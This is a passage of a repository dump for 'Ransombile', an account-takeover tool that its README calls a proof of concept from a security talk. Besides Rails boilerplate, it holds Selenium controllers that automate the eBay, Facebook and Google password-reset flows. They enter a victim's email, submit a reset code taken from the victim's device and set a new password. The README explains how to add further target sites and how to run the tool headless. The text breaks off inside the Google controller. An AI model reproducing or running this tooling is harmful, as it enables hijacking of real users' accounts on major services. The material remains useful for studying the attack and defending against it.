├── Gemfile
├── Gemfile.lock
├── README.md
├── Rakefile
├── app
├── assets
│ ├── config
│ │ └── manifest.js
│ ├── images
│ │ └── .keep
│ ├── javascripts
│ │ ├── application.js
│ │ ├── cable.js
│ │ ├── channels
│ │ │ └── .keep
│ │ ├── ebay.coffee
│ │ ├── facebook.coffee
│ │ ├── google.coffee
│ │ ├── linkedin.coffee
│ │ ├── paypal.coffee
│ │ ├── ransombile.coffee
│ │ ├── steam.coffee
│ │ ├── twitter.coffee
│ │ ├── website_template.coffee
│ │ └── wordpress.coffee
│ └── stylesheets
│ │ ├── application.css
│ │ ├── ebay.scss
│ │ ├── facebook.scss
│ │ ├── google.scss
│ │ ├── linkedin.scss
│ │ ├── paypal.scss
│ │ ├── ransombile.scss
│ │ ├── steam.scss
│ │ ├── twitter.scss
│ │ ├── website_template.scss
│ │ └── wordpress.scss
├── channels
│ └── application_cable
│ │ ├── channel.rb
│ │ └── connection.rb
├── controllers
│ ├── application_controller.rb
│ ├── concerns
│ │ └── .keep
│ ├── ebay_controller.rb
│ ├── facebook_controller.rb
│ ├── google_controller.rb
│ ├── linkedin_controller.rb
│ ├── paypal_controller.rb
│ ├── ransombile_controller.rb
│ ├── steam_controller.rb
│ ├── twitter_controller.rb
│ ├── website_template_controller.rb
│ └── wordpress_controller.rb
├── helpers
│ ├── application_helper.rb
│ ├── ebay_helper.rb
│ ├── facebook_helper.rb
│ ├── google_helper.rb
│ ├── linkedin_helper.rb
│ ├── paypal_helper.rb
│ ├── ransombile_helper.rb
│ ├── steam_helper.rb
│ ├── twitter_helper.rb
│ ├── website_template_helper.rb
│ └── wordpress_helper.rb
├── jobs
│ └── application_job.rb
├── mailers
│ └── application_mailer.rb
├── models
│ ├── application_record.rb
│ └── concerns
│ │ └── .keep
└── views
│ ├── layouts
│ ├── application.html.erb
│ ├── mailer.html.erb
│ └── mailer.text.erb
│ └── ransombile
│ └── index.html.erb
├── bin
├── bundle
├── rails
├── rake
├── setup
├── spring
└── update
├── config.ru
├── config
├── application.rb
├── boot.rb
├── cable.yml
├── database.yml
├── environment.rb
├── environments
│ ├── development.rb
│ ├── production.rb
│ └── test.rb
├── initializers
│ ├── application_controller_renderer.rb
│ ├── assets.rb
│ ├── backtrace_silencers.rb
│ ├── cookies_serializer.rb
│ ├── filter_parameter_logging.rb
│ ├── inflections.rb
│ ├── mime_types.rb
│ ├── new_framework_defaults.rb
│ ├── session_store.rb
│ └── wrap_parameters.rb
├── locales
│ └── en.yml
├── puma.rb
├── routes.rb
├── secrets.yml
└── spring.rb
├── db
├── development.sqlite3
└── seeds.rb
├── lib
├── assets
│ └── .keep
└── tasks
│ └── .keep
├── log
└── .keep
├── public
├── 404.html
├── 422.html
├── 500.html
├── apple-touch-icon-precomposed.png
├── apple-touch-icon.png
├── favicon.ico
└── robots.txt
├── test
├── controllers
│ ├── .keep
│ ├── ebay_controller_test.rb
│ ├── facebook_controller_test.rb
│ ├── google_controller_test.rb
│ ├── linkedin_controller_test.rb
│ ├── paypal_controller_test.rb
│ ├── ransombile_controller_test.rb
│ ├── steam_controller_test.rb
│ ├── twitter_controller_test.rb
│ ├── website_template_controller_test.rb
│ └── wordpress_controller_test.rb
├── fixtures
│ ├── .keep
│ └── files
│ │ └── .keep
├── helpers
│ └── .keep
├── integration
│ └── .keep
├── mailers
│ └── .keep
├── models
│ └── .keep
└── test_helper.rb
├── tmp
├── .keep
└── restart.txt
└── vendor
└── assets
├── javascripts
└── .keep
└── stylesheets
└── .keep
/Gemfile:
--------------------------------------------------------------------------------
1 | source 'https://rubygems.org'
2 |
3 | git_source(:github) do |repo_name|
4 | repo_name = "#{repo_name}/#{repo_name}" unless repo_name.include?("/")
5 | "https://github.com/#{repo_name}.git"
6 | end
7 |
8 |
9 | # Bundle edge Rails instead: gem 'rails', github: 'rails/rails'
10 | gem 'rails', '~> 5.0.2'
11 | # Use sqlite3 as the database for Active Record
12 | gem 'sqlite3'
13 | # Use Puma as the app server
14 | gem 'puma', '~> 3.0'
15 | # Use SCSS for stylesheets
16 | gem 'sass-rails', '~> 5.0'
17 | # Use Uglifier as compressor for JavaScript assets
18 | gem 'uglifier', '>= 1.3.0'
19 | # Use CoffeeScript for .coffee assets and views
20 | gem 'coffee-rails', '~> 4.2'
21 | # See https://github.com/rails/execjs#readme for more supported runtimes
22 | # gem 'therubyracer', platforms: :ruby
23 |
24 | # Use jquery as the JavaScript library
25 | gem 'jquery-rails'
26 | # Turbolinks makes navigating your web application faster. Read more: https://github.com/turbolinks/turbolinks
27 | gem 'turbolinks', '~> 5'
28 | # Build JSON APIs with ease. Read more: https://github.com/rails/jbuilder
29 | gem 'jbuilder', '~> 2.5'
30 | # Use Redis adapter to run Action Cable in production
31 | # gem 'redis', '~> 3.0'
32 | # Use ActiveModel has_secure_password
33 | # gem 'bcrypt', '~> 3.1.7'
34 |
35 | # Use Capistrano for deployment
36 | # gem 'capistrano-rails', group: :development
37 |
38 | group :development, :test do
39 | # Call 'byebug' anywhere in the code to stop execution and get a debugger console
40 | gem 'byebug', platform: :mri
41 | end
42 |
43 | group :development do
44 | # Access an IRB console on exception pages or by using <%= console %> anywhere in the code.
45 | gem 'web-console', '>= 3.3.0'
46 | gem 'listen', '~> 3.0.5'
47 | # Spring speeds up development by keeping your application running in the background. Read more: https://github.com/rails/spring
48 | gem 'spring'
49 | gem 'spring-watcher-listen', '~> 2.0.0'
50 | end
51 |
52 | # Windows does not include zoneinfo files, so bundle the tzinfo-data gem
53 | gem 'tzinfo-data', platforms: [:mingw, :mswin, :x64_mingw, :jruby]
54 |
55 | #To support Selenium
56 | gem 'selenium-webdriver'
--------------------------------------------------------------------------------
/Gemfile.lock:
--------------------------------------------------------------------------------
1 | GEM
2 | remote: https://rubygems.org/
3 | specs:
4 | actioncable (5.0.6)
5 | actionpack (= 5.0.6)
6 | nio4r (>= 1.2, < 3.0)
7 | websocket-driver (~> 0.6.1)
8 | actionmailer (5.0.6)
9 | actionpack (= 5.0.6)
10 | actionview (= 5.0.6)
11 | activejob (= 5.0.6)
12 | mail (~> 2.5, >= 2.5.4)
13 | rails-dom-testing (~> 2.0)
14 | actionpack (5.0.6)
15 | actionview (= 5.0.6)
16 | activesupport (= 5.0.6)
17 | rack (~> 2.0)
18 | rack-test (~> 0.6.3)
19 | rails-dom-testing (~> 2.0)
20 | rails-html-sanitizer (~> 1.0, >= 1.0.2)
21 | actionview (5.0.6)
22 | activesupport (= 5.0.6)
23 | builder (~> 3.1)
24 | erubis (~> 2.7.0)
25 | rails-dom-testing (~> 2.0)
26 | rails-html-sanitizer (~> 1.0, >= 1.0.3)
27 | activejob (5.0.6)
28 | activesupport (= 5.0.6)
29 | globalid (>= 0.3.6)
30 | activemodel (5.0.6)
31 | activesupport (= 5.0.6)
32 | activerecord (5.0.6)
33 | activemodel (= 5.0.6)
34 | activesupport (= 5.0.6)
35 | arel (~> 7.0)
36 | activesupport (5.0.6)
37 | concurrent-ruby (~> 1.0, >= 1.0.2)
38 | i18n (~> 0.7)
39 | minitest (~> 5.1)
40 | tzinfo (~> 1.1)
41 | arel (7.1.4)
42 | bindex (0.5.0)
43 | builder (3.2.3)
44 | byebug (9.1.0)
45 | childprocess (0.8.0)
46 | ffi (~> 1.0, >= 1.0.11)
47 | coffee-rails (4.2.2)
48 | coffee-script (>= 2.2.0)
49 | railties (>= 4.0.0)
50 | coffee-script (2.4.1)
51 | coffee-script-source
52 | execjs
53 | coffee-script-source (1.12.2)
54 | concurrent-ruby (1.0.5)
55 | crass (1.0.2)
56 | erubis (2.7.0)
57 | execjs (2.7.0)
58 | ffi (1.9.18)
59 | globalid (0.4.0)
60 | activesupport (>= 4.2.0)
61 | i18n (0.8.6)
62 | jbuilder (2.7.0)
63 | activesupport (>= 4.2.0)
64 | multi_json (>= 1.2)
65 | jquery-rails (4.3.1)
66 | rails-dom-testing (>= 1, < 3)
67 | railties (>= 4.2.0)
68 | thor (>= 0.14, < 2.0)
69 | listen (3.0.8)
70 | rb-fsevent (~> 0.9, >= 0.9.4)
71 | rb-inotify (~> 0.9, >= 0.9.7)
72 | loofah (2.1.1)
73 | crass (~> 1.0.2)
74 | nokogiri (>= 1.5.9)
75 | mail (2.6.6)
76 | mime-types (>= 1.16, < 4)
77 | method_source (0.9.0)
78 | mime-types (3.1)
79 | mime-types-data (~> 3.2015)
80 | mime-types-data (3.2016.0521)
81 | mini_portile2 (2.3.0)
82 | minitest (5.10.3)
83 | multi_json (1.12.2)
84 | nio4r (2.1.0)
85 | nokogiri (1.8.1)
86 | mini_portile2 (~> 2.3.0)
87 | puma (3.10.0)
88 | rack (2.0.3)
89 | rack-test (0.6.3)
90 | rack (>= 1.0)
91 | rails (5.0.6)
92 | actioncable (= 5.0.6)
93 | actionmailer (= 5.0.6)
94 | actionpack (= 5.0.6)
95 | actionview (= 5.0.6)
96 | activejob (= 5.0.6)
97 | activemodel (= 5.0.6)
98 | activerecord (= 5.0.6)
99 | activesupport (= 5.0.6)
100 | bundler (>= 1.3.0)
101 | railties (= 5.0.6)
102 | sprockets-rails (>= 2.0.0)
103 | rails-dom-testing (2.0.3)
104 | activesupport (>= 4.2.0)
105 | nokogiri (>= 1.6)
106 | rails-html-sanitizer (1.0.3)
107 | loofah (~> 2.0)
108 | railties (5.0.6)
109 | actionpack (= 5.0.6)
110 | activesupport (= 5.0.6)
111 | method_source
112 | rake (>= 0.8.7)
113 | thor (>= 0.18.1, < 2.0)
114 | rake (12.1.0)
115 | rb-fsevent (0.10.2)
116 | rb-inotify (0.9.10)
117 | ffi (>= 0.5.0, < 2)
118 | rubyzip (1.2.1)
119 | sass (3.5.1)
120 | sass-listen (~> 4.0.0)
121 | sass-listen (4.0.0)
122 | rb-fsevent (~> 0.9, >= 0.9.4)
123 | rb-inotify (~> 0.9, >= 0.9.7)
124 | sass-rails (5.0.6)
125 | railties (>= 4.0.0, < 6)
126 | sass (~> 3.1)
127 | sprockets (>= 2.8, < 4.0)
128 | sprockets-rails (>= 2.0, < 4.0)
129 | tilt (>= 1.1, < 3)
130 | selenium-webdriver (3.6.0)
131 | childprocess (~> 0.5)
132 | rubyzip (~> 1.0)
133 | spring (2.0.2)
134 | activesupport (>= 4.2)
135 | spring-watcher-listen (2.0.1)
136 | listen (>= 2.7, < 4.0)
137 | spring (>= 1.2, < 3.0)
138 | sprockets (3.7.1)
139 | concurrent-ruby (~> 1.0)
140 | rack (> 1, < 3)
141 | sprockets-rails (3.2.1)
142 | actionpack (>= 4.0)
143 | activesupport (>= 4.0)
144 | sprockets (>= 3.0.0)
145 | sqlite3 (1.3.13)
146 | thor (0.20.0)
147 | thread_safe (0.3.6)
148 | tilt (2.0.8)
149 | turbolinks (5.0.1)
150 | turbolinks-source (~> 5)
151 | turbolinks-source (5.0.3)
152 | tzinfo (1.2.3)
153 | thread_safe (~> 0.1)
154 | uglifier (3.2.0)
155 | execjs (>= 0.3.0, < 3)
156 | web-console (3.5.1)
157 | actionview (>= 5.0)
158 | activemodel (>= 5.0)
159 | bindex (>= 0.4.0)
160 | railties (>= 5.0)
161 | websocket-driver (0.6.5)
162 | websocket-extensions (>= 0.1.0)
163 | websocket-extensions (0.1.2)
164 |
165 | PLATFORMS
166 | ruby
167 |
168 | DEPENDENCIES
169 | byebug
170 | coffee-rails (~> 4.2)
171 | jbuilder (~> 2.5)
172 | jquery-rails
173 | listen (~> 3.0.5)
174 | puma (~> 3.0)
175 | rails (~> 5.0.2)
176 | sass-rails (~> 5.0)
177 | selenium-webdriver
178 | spring
179 | spring-watcher-listen (~> 2.0.0)
180 | sqlite3
181 | turbolinks (~> 5)
182 | tzinfo-data
183 | uglifier (>= 1.3.0)
184 | web-console (>= 3.3.0)
185 |
186 | BUNDLED WITH
187 | 1.14.6
188 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Ransombile
2 |
3 | Ransombile is a tool that automates the password reset process and allows you to perform the entire flow automatically for multiple sites at the same time. The aim is to automate the three steps that take the longest in our proposed attack vector.
4 |
5 | This tool only serves as a PoC to show that password reset can be automated effectively. Consider it an Alpha version. Things will fail and some sites I added don't work for various reasons (UI in a language different than English, A/B testing, timing issues, etc.).
6 |
7 | For details and demos please check: [https://www.martinvigo.com/ransombile](https://www.martinvigo.com/ransombile)
8 |
9 | ## Installation
10 |
11 | Ransombile is a rails app. It should work on any version but I wrote and tested it on Ruby 2.4 and Rails 5.0
12 |
13 | ## Setup
14 |
15 | You need an email inbox to which you will be sending emails from the Victim's device to retrieve the victim;s email address. Add the credentials information to the *ransombile_controller* file.
16 |
17 | You can change the selenium plugin to use any browser but it comes configured to use Firefox by default to make development and testing easier. In fact, if you would "deploy" Ransombile, you probably want to use a headless browsers like PhantomJS.
18 |
19 | ## Usage
20 |
21 | Launch the server and run the webapp on any browser. It is optimized for mobile device screen sizes.
22 |
23 | ```rails server```
24 |
25 | ## Adding websites
26 |
27 | I left a template under */controllers/website_templates_controller*. It gives you a skeleton with the basic functions and implementation. Just add the missing code where indicated.
28 |
29 | You can create a new controller using the new website name
30 |
31 | ```rails generate controller Websitename```
32 |
33 | Next, you need to update the UI, file *index.html.erb*. Just copy paste what's already there for any other site. Don't forget to update the function *initiatePasswordReset()*!
34 |
35 | Last, update the *routes* file
36 |
37 | ## Demo video
38 | [](https://www.youtube.com/watch?v=-d152pJ_Ua0)
39 |
40 | ## Tool presentation at BSides Las Vegas 2018
41 | [](https://www.youtube.com/watch?v=7MbgFTJrhss)
42 |
43 | ## Authors
44 |
45 | Martin Vigo - @martin_vigo - [martinvigo.com](https://www.martinvigo.com)
46 |
--------------------------------------------------------------------------------
/Rakefile:
--------------------------------------------------------------------------------
1 | # Add your own tasks in files placed in lib/tasks ending in .rake,
2 | # for example lib/tasks/capistrano.rake, and they will automatically be available to Rake.
3 |
4 | require_relative 'config/application'
5 |
6 | Rails.application.load_tasks
7 |
--------------------------------------------------------------------------------
/app/assets/config/manifest.js:
--------------------------------------------------------------------------------
1 | //= link_tree ../images
2 | //= link_directory ../javascripts .js
3 | //= link_directory ../stylesheets .css
4 |
--------------------------------------------------------------------------------
/app/assets/images/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/app/assets/images/.keep
--------------------------------------------------------------------------------
/app/assets/javascripts/application.js:
--------------------------------------------------------------------------------
1 | // This is a manifest file that'll be compiled into application.js, which will include all the files
2 | // listed below.
3 | //
4 | // Any JavaScript/Coffee file within this directory, lib/assets/javascripts, vendor/assets/javascripts,
5 | // or any plugin's vendor/assets/javascripts directory can be referenced here using a relative path.
6 | //
7 | // It's not advisable to add code directly here, but if you do, it'll appear at the bottom of the
8 | // compiled file. JavaScript code in this file should be added after the last require_* statement.
9 | //
10 | // Read Sprockets README (https://github.com/rails/sprockets#sprockets-directives) for details
11 | // about supported directives.
12 | //
13 | //= require jquery
14 | //= require jquery_ujs
15 | //= require turbolinks
16 | //= require_tree .
17 |
--------------------------------------------------------------------------------
/app/assets/javascripts/cable.js:
--------------------------------------------------------------------------------
1 | // Action Cable provides the framework to deal with WebSockets in Rails.
2 | // You can generate new channels where WebSocket features live using the rails generate channel command.
3 | //
4 | //= require action_cable
5 | //= require_self
6 | //= require_tree ./channels
7 |
8 | (function() {
9 | this.App || (this.App = {});
10 |
11 | App.cable = ActionCable.createConsumer();
12 |
13 | }).call(this);
14 |
--------------------------------------------------------------------------------
/app/assets/javascripts/channels/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/app/assets/javascripts/channels/.keep
--------------------------------------------------------------------------------
/app/assets/javascripts/ebay.coffee:
--------------------------------------------------------------------------------
1 | # Place all the behaviors and hooks related to the matching controller here.
2 | # All this logic will automatically be available in application.js.
3 | # You can use CoffeeScript in this file: http://coffeescript.org/
4 |
--------------------------------------------------------------------------------
/app/assets/javascripts/facebook.coffee:
--------------------------------------------------------------------------------
1 | # Place all the behaviors and hooks related to the matching controller here.
2 | # All this logic will automatically be available in application.js.
3 | # You can use CoffeeScript in this file: http://coffeescript.org/
4 |
--------------------------------------------------------------------------------
/app/assets/javascripts/google.coffee:
--------------------------------------------------------------------------------
1 | # Place all the behaviors and hooks related to the matching controller here.
2 | # All this logic will automatically be available in application.js.
3 | # You can use CoffeeScript in this file: http://coffeescript.org/
4 |
--------------------------------------------------------------------------------
/app/assets/javascripts/linkedin.coffee:
--------------------------------------------------------------------------------
1 | # Place all the behaviors and hooks related to the matching controller here.
2 | # All this logic will automatically be available in application.js.
3 | # You can use CoffeeScript in this file: http://coffeescript.org/
4 |
--------------------------------------------------------------------------------
/app/assets/javascripts/paypal.coffee:
--------------------------------------------------------------------------------
1 | # Place all the behaviors and hooks related to the matching controller here.
2 | # All this logic will automatically be available in application.js.
3 | # You can use CoffeeScript in this file: http://coffeescript.org/
4 |
--------------------------------------------------------------------------------
/app/assets/javascripts/ransombile.coffee:
--------------------------------------------------------------------------------
1 | # Place all the behaviors and hooks related to the matching controller here.
2 | # All this logic will automatically be available in application.js.
3 | # You can use CoffeeScript in this file: http://coffeescript.org/
4 |
--------------------------------------------------------------------------------
/app/assets/javascripts/steam.coffee:
--------------------------------------------------------------------------------
1 | # Place all the behaviors and hooks related to the matching controller here.
2 | # All this logic will automatically be available in application.js.
3 | # You can use CoffeeScript in this file: http://coffeescript.org/
4 |
--------------------------------------------------------------------------------
/app/assets/javascripts/twitter.coffee:
--------------------------------------------------------------------------------
1 | # Place all the behaviors and hooks related to the matching controller here.
2 | # All this logic will automatically be available in application.js.
3 | # You can use CoffeeScript in this file: http://coffeescript.org/
4 |
--------------------------------------------------------------------------------
/app/assets/javascripts/website_template.coffee:
--------------------------------------------------------------------------------
1 | # Place all the behaviors and hooks related to the matching controller here.
2 | # All this logic will automatically be available in application.js.
3 | # You can use CoffeeScript in this file: http://coffeescript.org/
4 |
--------------------------------------------------------------------------------
/app/assets/javascripts/wordpress.coffee:
--------------------------------------------------------------------------------
1 | # Place all the behaviors and hooks related to the matching controller here.
2 | # All this logic will automatically be available in application.js.
3 | # You can use CoffeeScript in this file: http://coffeescript.org/
4 |
--------------------------------------------------------------------------------
/app/assets/stylesheets/application.css:
--------------------------------------------------------------------------------
1 | /*
2 | * This is a manifest file that'll be compiled into application.css, which will include all the files
3 | * listed below.
4 | *
5 | * Any CSS and SCSS file within this directory, lib/assets/stylesheets, vendor/assets/stylesheets,
6 | * or any plugin's vendor/assets/stylesheets directory can be referenced here using a relative path.
7 | *
8 | * You're free to add application-wide styles to this file and they'll appear at the bottom of the
9 | * compiled file so the styles you add here take precedence over styles defined in any other CSS/SCSS
10 | * files in this directory. Styles in this file should be added after the last require_* statement.
11 | * It is generally better to create a new file per style scope.
12 | *
13 | *= require_tree .
14 | *= require_self
15 | */
16 |
--------------------------------------------------------------------------------
/app/assets/stylesheets/ebay.scss:
--------------------------------------------------------------------------------
1 | // Place all the styles related to the Ebay controller here.
2 | // They will automatically be included in application.css.
3 | // You can use Sass (SCSS) here: http://sass-lang.com/
4 |
--------------------------------------------------------------------------------
/app/assets/stylesheets/facebook.scss:
--------------------------------------------------------------------------------
1 | // Place all the styles related to the Facebook controller here.
2 | // They will automatically be included in application.css.
3 | // You can use Sass (SCSS) here: http://sass-lang.com/
4 |
--------------------------------------------------------------------------------
/app/assets/stylesheets/google.scss:
--------------------------------------------------------------------------------
1 | // Place all the styles related to the Google controller here.
2 | // They will automatically be included in application.css.
3 | // You can use Sass (SCSS) here: http://sass-lang.com/
4 |
--------------------------------------------------------------------------------
/app/assets/stylesheets/linkedin.scss:
--------------------------------------------------------------------------------
1 | // Place all the styles related to the Linkedin controller here.
2 | // They will automatically be included in application.css.
3 | // You can use Sass (SCSS) here: http://sass-lang.com/
4 |
--------------------------------------------------------------------------------
/app/assets/stylesheets/paypal.scss:
--------------------------------------------------------------------------------
1 | // Place all the styles related to the Paypal controller here.
2 | // They will automatically be included in application.css.
3 | // You can use Sass (SCSS) here: http://sass-lang.com/
4 |
--------------------------------------------------------------------------------
/app/assets/stylesheets/ransombile.scss:
--------------------------------------------------------------------------------
1 | // Place all the styles related to the Ransombile controller here.
2 | // They will automatically be included in application.css.
3 | // You can use Sass (SCSS) here: http://sass-lang.com/
4 |
5 | #mainDiv{
6 | width: 95%;
7 | margin: auto;
8 | padding: 15px;
9 | }
10 |
11 | .label{
12 | font-size: 3em;
13 | font-weight: bold;
14 | }
15 |
16 | .statusLabel, #emailVictimLabel, #phoneVictimLabel{
17 | font-size: 2.8em;
18 | font-style: italic;
19 | margin-left: 10px;
20 | }
21 |
22 | input{
23 | width: 69%;
24 | font-size: 50px;
25 | }
26 |
27 | button {
28 | float: right;
29 | height: 90px;
30 | width: 180px;
31 | font-size: 30px;
32 | text-align: center;
33 | color: red;
34 | border: 5px solid red;
35 | }
36 |
37 | .inputAndButton{
38 | width: 100%;
39 | margin-bottom: 30px;
40 | }
41 |
42 | #title{
43 | margin-bottom: 20px;
44 | text-align: center;
45 | display: block;
46 | font-size: 9em;
47 | }
48 |
49 | #passwordInput{
50 | margin-bottom: 20px;
51 | }
52 |
53 | #emailVictimLabel, #phoneVictimLabel{
54 | color: blue;
55 | text-decoration: underline;
56 | }
57 |
58 |
59 | #labelAndStatus{
60 | float: left;
61 | width: 100%;
62 | display: block;
63 | font-size: 3em;
64 | }
65 |
66 | #border{
67 | border: solid 3px;
68 | padding: 15px;
69 | margin-bottom: 100px;
70 | margin-bottom: 40px;
71 | }
72 |
73 |
74 | #phoneLabels, #emailLabels{
75 | display: block;
76 | }
77 |
--------------------------------------------------------------------------------
/app/assets/stylesheets/steam.scss:
--------------------------------------------------------------------------------
1 | // Place all the styles related to the Steam controller here.
2 | // They will automatically be included in application.css.
3 | // You can use Sass (SCSS) here: http://sass-lang.com/
4 |
--------------------------------------------------------------------------------
/app/assets/stylesheets/twitter.scss:
--------------------------------------------------------------------------------
1 | // Place all the styles related to the Twitter controller here.
2 | // They will automatically be included in application.css.
3 | // You can use Sass (SCSS) here: http://sass-lang.com/
4 |
--------------------------------------------------------------------------------
/app/assets/stylesheets/website_template.scss:
--------------------------------------------------------------------------------
1 | // Place all the styles related to the WebsiteTemplate controller here.
2 | // They will automatically be included in application.css.
3 | // You can use Sass (SCSS) here: http://sass-lang.com/
4 |
--------------------------------------------------------------------------------
/app/assets/stylesheets/wordpress.scss:
--------------------------------------------------------------------------------
1 | // Place all the styles related to the Wordpress controller here.
2 | // They will automatically be included in application.css.
3 | // You can use Sass (SCSS) here: http://sass-lang.com/
4 |
--------------------------------------------------------------------------------
/app/channels/application_cable/channel.rb:
--------------------------------------------------------------------------------
1 | module ApplicationCable
2 | class Channel < ActionCable::Channel::Base
3 | end
4 | end
5 |
--------------------------------------------------------------------------------
/app/channels/application_cable/connection.rb:
--------------------------------------------------------------------------------
1 | module ApplicationCable
2 | class Connection < ActionCable::Connection::Base
3 | end
4 | end
5 |
--------------------------------------------------------------------------------
/app/controllers/application_controller.rb:
--------------------------------------------------------------------------------
1 | require "selenium-webdriver"
2 |
3 | class ApplicationController < ActionController::Base
4 | protect_from_forgery with: :exception
5 |
6 | end
7 |
--------------------------------------------------------------------------------
/app/controllers/concerns/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/app/controllers/concerns/.keep
--------------------------------------------------------------------------------
/app/controllers/ebay_controller.rb:
--------------------------------------------------------------------------------
1 | class EbayController < ApplicationController
2 | $selenium_driver = nil
3 |
4 | # To start the password reset process using the email
5 | def initiate
6 | begin
7 | $selenium_driver = Selenium::WebDriver.for :firefox
8 | base_url = "https://fyp.ebay.com/"
9 | $selenium_driver.get(base_url)
10 |
11 | wait = Selenium::WebDriver::Wait.new(:timeout => 5)
12 | wait.until { $selenium_driver.find_element(:id, "userInfo").displayed? }
13 | $selenium_driver.find_element(:id, "userInfo").send_keys params[:email]
14 | $selenium_driver.find_element(:id, "userInfo").send_keys :return
15 |
16 | wait.until { $selenium_driver.find_element(:id, "defaulttext").displayed? }
17 | $selenium_driver.find_element(:id, "defaulttext").click
18 |
19 | render :json => {"website": "ebay", "status": "Waiting for temp code..."} # Replace WEBSITE with appropiate website name
20 |
21 | rescue Exception => e
22 | puts e.to_s
23 | puts e.backtrace
24 | render :status => 500, :json => {"website": "ebay", "status": "Password reset failed!"} # Replace WEBSITE with appropiate website name
25 | end
26 | end
27 |
28 |
29 |
30 | # To handle the temp code input, set new password and finish the password reset process
31 | def finish
32 | begin
33 | wait = Selenium::WebDriver::Wait.new(:timeout => 5)
34 | wait.until { $selenium_driver.find_element(:id, "pinTxtBx").displayed? }
35 | $selenium_driver.find_element(:id, "pinTxtBx").send_keys params[:temp_code]
36 | $selenium_driver.find_element(:id, "pinTxtBx").send_keys :return
37 |
38 | wait.until { $selenium_driver.find_element(:id, "password").displayed? }
39 | $selenium_driver.find_element(:id, "password").send_keys params[:password]
40 | $selenium_driver.find_element(:id, "password").send_keys :return
41 |
42 | render :json => {"website": "ebay", "status": "Password reset successful!"} # Replace WEBSITE with appropiate website name
43 |
44 | rescue Exception => e
45 | puts e.to_s
46 | puts e.backtrace
47 | render :status => 500, :json => {"website": "ebay", "status": "Password reset failed!"} # Replace WEBSITE with appropiate website name
48 | end
49 | end
50 |
51 | end
52 |
--------------------------------------------------------------------------------
/app/controllers/facebook_controller.rb:
--------------------------------------------------------------------------------
1 | class FacebookController < ApplicationController
2 | $selenium_driver = nil
3 |
4 | # To start the password reset process using the email
5 | def initiate
6 | begin
7 | $selenium_driver = Selenium::WebDriver.for :firefox
8 | base_url = "https://www.facebook.com/recover/initiate"
9 | $selenium_driver.get(base_url)
10 |
11 | wait = Selenium::WebDriver::Wait.new(:timeout => 5)
12 | wait.until { $selenium_driver.find_element(:id => "identify_email").displayed? }
13 | $selenium_driver.find_element(:id, "identify_email").clear
14 | $selenium_driver.find_element(:id, "identify_email").send_keys params[:email]
15 | $selenium_driver.find_element(:xpath, "//input[contains(@value,'Search')]").click
16 |
17 | wait.until { $selenium_driver.find_element(:xpath, "//input[contains(@id,'send_sms')]").displayed? }
18 | $selenium_driver.find_element(:xpath, "//input[contains(@id,'send_sms')]").click
19 | if not $selenium_driver.find_element(:xpath, "//input[contains(@id,'send_sms')]").selected? # double check
20 | $selenium_driver.find_element(:xpath, "//input[contains(@id,'send_sms')]").click
21 | end
22 | $selenium_driver.find_element(:xpath, "//button[@type='submit']").click
23 |
24 | render :json => {"website": "facebook", "status": "Waiting for temp code..."}
25 |
26 | rescue Exception => e
27 | puts e.to_s
28 | puts e.backtrace
29 | render :status => 500, :json => {"website": "facebook", "status": "Password reset failed!"}
30 | end
31 | end
32 |
33 |
34 |
35 | # To handle the temp code input, set new password and finish the password reset process
36 | def finish
37 | begin
38 | wait = Selenium::WebDriver::Wait.new(:timeout => 5)
39 | wait.until { $selenium_driver.find_element(:name => "n").displayed? }
40 | $selenium_driver.find_element(:name, "n").clear
41 | $selenium_driver.find_element(:name, "n").send_keys params[:temp_code]
42 | $selenium_driver.find_element(:xpath, "//button[@type='submit']").click
43 |
44 | wait.until { $selenium_driver.find_element(:id => "password_new").displayed? }
45 | $selenium_driver.find_element(:id, "password_new").clear
46 | $selenium_driver.find_element(:id, "password_new").send_keys params[:password]
47 | $selenium_driver.find_element(:id, "btn_continue").click
48 |
49 | render :json => {"website": "facebook", "status": "Password reset successful!"}
50 |
51 | rescue Exception => e
52 | puts e.to_s
53 | puts e.backtrace
54 | render :status => 500, :json => {"website": "facebook", "status": "Password reset failed!"}
55 | end
56 | end
57 |
58 | end
59 |
--------------------------------------------------------------------------------
/app/controllers/google_controller.rb:
--------------------------------------------------------------------------------
1 | class GoogleController < ApplicationController
2 | $selenium_driver = nil
3 |
4 |
5 | def initiate
6 | begin
7 | $selenium_driver = Selenium::WebDriver.for :firefox
8 | base_url = "https://accounts.google.com?hl=en"
9 | $selenium_driver.get(base_url)
10 | wait = Selenium::WebDriver::Wait.new(:timeout => 5)
11 |
12 | begin # Handles Google's A/B testing
13 | $selenium_driver.find_element(:id, "Email").clear
14 | $selenium_driver.find_element(:id, "Email").send_keys params[:email]
15 | $selenium_driver.find_element(:id, "next").click
16 |
17 | wait.until { $selenium_driver.find_element(:id => "link-forgot-passwd").displayed? }
18 | $selenium_driver.find_element(:id, "link-forgot-passwd").click
19 | rescue Selenium::WebDriver::Error::NoSuchElementError => e
20 | $selenium_driver.find_element(:id, "identifierId").clear
21 | $selenium_driver.find_element(:id, "identifierId").send_keys params[:email]
22 | $selenium_driver.find_element(:id, "identifierId").send_keys :return
23 |
24 | wait.until { $selenium_driver.find_element(:id, "forgotPassword").displayed? }
25 | $selenium_driver.find_element(:id, "forgotPassword").send_keys :tab
26 | $selenium_driver.find_element(:id, "forgotPassword").send_keys :return
27 | end
28 |
29 | begin
30 | $selenium_driver.find_element(:id => "idvPreresteredPhoneSms").displayed?
31 |
32 | rescue Selenium::WebDriver::Error::NoSuchElementError => e
33 | begin
34 | wait.until { $selenium_driver.find_element(:id => "skipChallenge").displayed? }
35 | $selenium_driver.find_element(:id, "skipChallenge").click
36 | sleep 1
37 | $selenium_driver.find_element(:id => "idvPreresteredPhoneSms").displayed?
38 | rescue Selenium::WebDriver::Error::NoSuchElementError => e
39 | wait.until { $selenium_driver.find_element(:id => "skipChallenge").displayed? }
40 | $selenium_driver.find_element(:id, "skipChallenge").click
41 | sleep 1
42 | rescue Selenium::WebDriver::Error::TimeOutError => e # Handles Google's A/B testing
43 | wait.until { $selenium_driver.find_element(:xpath, "//span[text()='Try another way']").displayed? }
